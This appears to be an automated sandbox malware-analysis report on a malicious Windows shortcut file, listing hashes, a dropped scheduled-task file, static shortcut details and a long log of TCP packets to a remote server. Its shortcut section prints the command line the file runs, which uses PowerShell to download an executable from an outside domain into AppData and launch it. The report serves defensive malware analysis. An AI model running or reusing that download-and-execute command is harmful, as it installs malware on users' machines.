Preview:	]dQ.cK.HM.oxC.bO].mQB...L.hHK....W..baW...f`kn.F.Iq.InDbX.M.J.W.CQF.]..M.....G.......J.GN......r.xZE.w.LP...h.[gx.cGq..ej..iQ.I...Q..V.....A.N..kX...ru..w.ZsOSBK..O...F..D...\Mh.q......`MjE.v...W.i.edA....UZ.x.Pf...Y.S.X...DQSG..y..GF..SD...y.pHM...mIE...].rY.jmZ.wA...eNnuh...jk.N.TI.s..W..M...xrSwCYKVq..Uf[r..Mm.uR......U.]..M.VobY...V.A.H_r....b\a..x.r.aj.P..r.O..ik.....]Lf.Ei..S..D...d.........qR..Aw.Q.QH..b...p.Of..v.p..]..t...g.lg.HD.g...O..K.CKj._...vI..Wu.sPu..PDPZ.\vvw.b...sQ.M.^.B..X...r.f.....ja..j..k.p.\J.UVg...S_Zq.c....I..hN[f..A.F_..WY.]Qr...YL.co.Y......I.......O...jG.Q.x]pp_.u^Vr..iiI..L_..SyWf`nr.b.`..e.Hm...B....y...Y.....d....qFUg.Ma..uPB_\.\..f..i..jE.v.....uxRV..[aM.l.Y..NT...vbef...bBcsRs.jW...pH.`B.FVL^.......y.....Z.....W...._eu..W.P...FYX.d..CE..dxg.....F.b^...MfysH...q.k..^..l....M...wqX.M`...B[..WN.]..M.......A.U.ZX[.n]........xTup...^y.nUgpcx..iu.`.Rv].i\b..UIwA..M..TQ.T.F...jA..p..VI.m.R..Va...V.P.H..y..vhjr....l..oZ.....[y.b.O.FA.c.DEQ]..n.ZU.Dt[Z.O.T.]...

C:\Windows\Tasks\lnfast_x64.job

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	304
Entropy (8bit):	3.6108930063637357
Encrypted:	false
SSDEEP:	6:p8fcMlW8g1UEZglJPZOjzkjTtcVAkXIEZ8MlW8+y0lbeXrQ/P1:pmckXg1MJsQkXd8kX+VN/t
MD5:	E63E7D823FCDF42D66BFFC11A953063D
SHA1:	BEFB1B1B4D8840BFC61D0B0207DF3BA8132AC6F7
SHA-256:	1F6CB39EFBA9971CBC3B0B22414A9FFC4A26A4B06459AD829670BA378369F672
SHA-512:	0C129CEA52AC3C0BF3B5884FD3C3B1B18CF4CC3AF592DCDFD6B1AE0C6DFD35F3C4BD9CFB3A16E53FAA8B672329D72FED4442FB967D3C0392FBC2ED826892F043
Malicious:	false
Preview:	.....f..m..D........F.......<... ................ ....................:.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0.........B.......".............................

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=1, Archive, ctime=Mon Aug 26 12:29:30 2024, mtime=Mon Aug 26 12:29:30 2024, atime=Mon Aug 26 12:29:30 2024, length=278528, window=hidenormalshowminimized
Entropy (8bit):	4.424094726130394
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	MdkbG2pK4l.lnk
File size:	1'459 bytes
MD5:	9ee2b12e8974f00111bb9887f7f9e19f
SHA1:	54d2830260e949b25d291c07ebc6d29d8b4f0af8
SHA256:	f5734ae475931dbb561fc5b636d5a7825d8d99efa8d4d9cdff7e89bf163613dd
SHA512:	4d872cdd7c8428cd3b73f1664ffcc0380fe0171fc172b0262c6d8f9bd6d4e0679fd81387cc3d75cab7c04afc518c99b514459a98e082550edd3d7be3edb69c1c
SSDEEP:	24:8eJdPVzSPFA21Suf+/JKiGkmwC4I0WxwQ13idyD11BabQvORhtC/5:86NzAuDuXkmCId13iyD11Baj
TLSH:	F831CE186BEB8335D2B6AA3A6EBAE7159B20FC028A434F5F0194554D7813311A825F2B
File Content Preview:	L..................F.... ...........J.......J........@......................5....P.O. .:i.....+00.../C:\...................V.1.....2Ye...Windows.@......./M.12Ye............................c9.W.i.n.d.o.w.s.....Z.1.....8Y\@..System32..B......./M.18Y\@......

File Icon


Icon Hash:	74f4d4dcdcc9e1ed

Static Windows Shortcut Info

General
Relative Path:	..\Windows\System32\cmd.exe
Command Line Argument:	/c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile %APPDATA%/hello.exe && %APPDATA%/hello.exe
Icon location:	%SystemRoot%\System32\SHELL32.dll

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 18:33:51.619410038 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:51.624274969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:51.624722958 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:51.627652884 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:51.632455111 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.250852108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.250910997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.251014948 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.251187086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.251240969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.251296043 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.251602888 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.251645088 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.251702070 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.252248049 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.252285004 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.252334118 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.252341986 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.252602100 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.256278038 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.257424116 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.257669926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.257704973 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.257757902 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.258102894 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.259959936 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.329159021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.329255104 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.330077887 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.341597080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.341743946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.341763020 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.341825008 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.342274904 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.342319012 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.342457056 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.342761040 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.342778921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.342816114 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.343457937 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.343477964 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.343521118 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.343978882 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.343992949 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.344032049 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.344391108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.344405890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.344430923 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.344975948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.344994068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.345032930 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.345668077 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.345686913 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.345716953 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.346374035 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.346391916 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.346432924 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.347033024 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.347052097 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.347069979 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.347091913 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.347105980 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.432348013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.432442904 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.432460070 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.432506084 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.433075905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.433093071 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.433126926 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.433675051 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.433693886 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.433731079 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.434329987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.434345961 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.434386969 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.434993982 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.435009956 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.435067892 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.435671091 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.435686111 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.435717106 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.436347961 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.436364889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.436378956 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.436391115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.436418056 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.437093973 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.437108994 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.437180996 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.437707901 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.437724113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.437762976 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.438393116 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.438409090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.438448906 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.439074993 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.439095974 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.439110041 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.439157963 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.439631939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.439646959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.439661026 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.439677954 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.439708948 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.440469980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.440485001 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.440500021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.440534115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.441299915 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.441334963 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.441355944 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.441369057 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.441406965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.441454887 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.442109108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.442151070 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.442183018 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.442186117 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.442333937 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.442931890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.442965984 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.443001032 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.443017006 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.453454018 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.453515053 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.453589916 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.453604937 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.453669071 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.453828096 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.500663042 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.557224989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.557286978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.557303905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.557339907 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.557852030 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.557868004 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.557900906 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.558255911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.558270931 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.558315039 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.558804035 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.558821917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.558837891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.558842897 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.558857918 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.558882952 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.559509039 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.559524059 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.559537888 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.559562922 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.559583902 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.560401917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.560419083 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.560434103 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.560456991 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.561291933 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.561306953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.561321020 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.561335087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.561338902 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.561355114 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.562167883 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.562182903 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.562197924 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.562223911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.562249899 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.563081980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.563097000 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.563110113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.563132048 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.563174963 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.563878059 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.563893080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.563915968 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.563931942 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.564649105 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.564666033 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.564680099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.564694881 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.564706087 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.564739943 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.565521955 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.565536976 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.565551043 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.565557003 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.565566063 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.565579891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.565583944 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.565608025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.566422939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.566438913 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.566452980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.566468000 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.566513062 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.566535950 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.567365885 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.567380905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.567414999 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.567423105 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.567430019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.567445040 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.567470074 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.568248987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.568264008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.568279028 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.568281889 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.568407059 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.579931021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.580032110 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.580046892 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.580065966 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.580324888 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.580338955 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.580357075 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.580360889 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.580393076 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.669692039 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.669712067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.669723034 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.669796944 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.670650959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.670665979 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.670681953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.670721054 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.670730114 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.671302080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.671315908 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.671365023 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.671469927 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.672148943 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.672166109 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.672209024 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.672328949 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.672344923 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.672359943 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.672369003 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.672398090 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.673237085 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.673253059 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.673268080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.673291922 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.673763037 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.673777103 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.673791885 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.673825979 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.673938990 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.674259901 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.674274921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.674357891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.674367905 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.674375057 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.674390078 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.674405098 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.674420118 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.674432039 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.674436092 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.674451113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.674468994 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.674468994 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.674474955 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.674484015 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.674508095 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.674994946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.675009966 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.675024033 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.675045967 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.675082922 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.675745964 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.675760984 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.675776005 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.675817966 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.676495075 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.676510096 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.676523924 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.676531076 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.676539898 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.676558971 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:52.677112103 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.677126884 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.677140951 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.677155972 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:52.677162886 CEST	49699	80	192.168.2.7	172.94.3.25
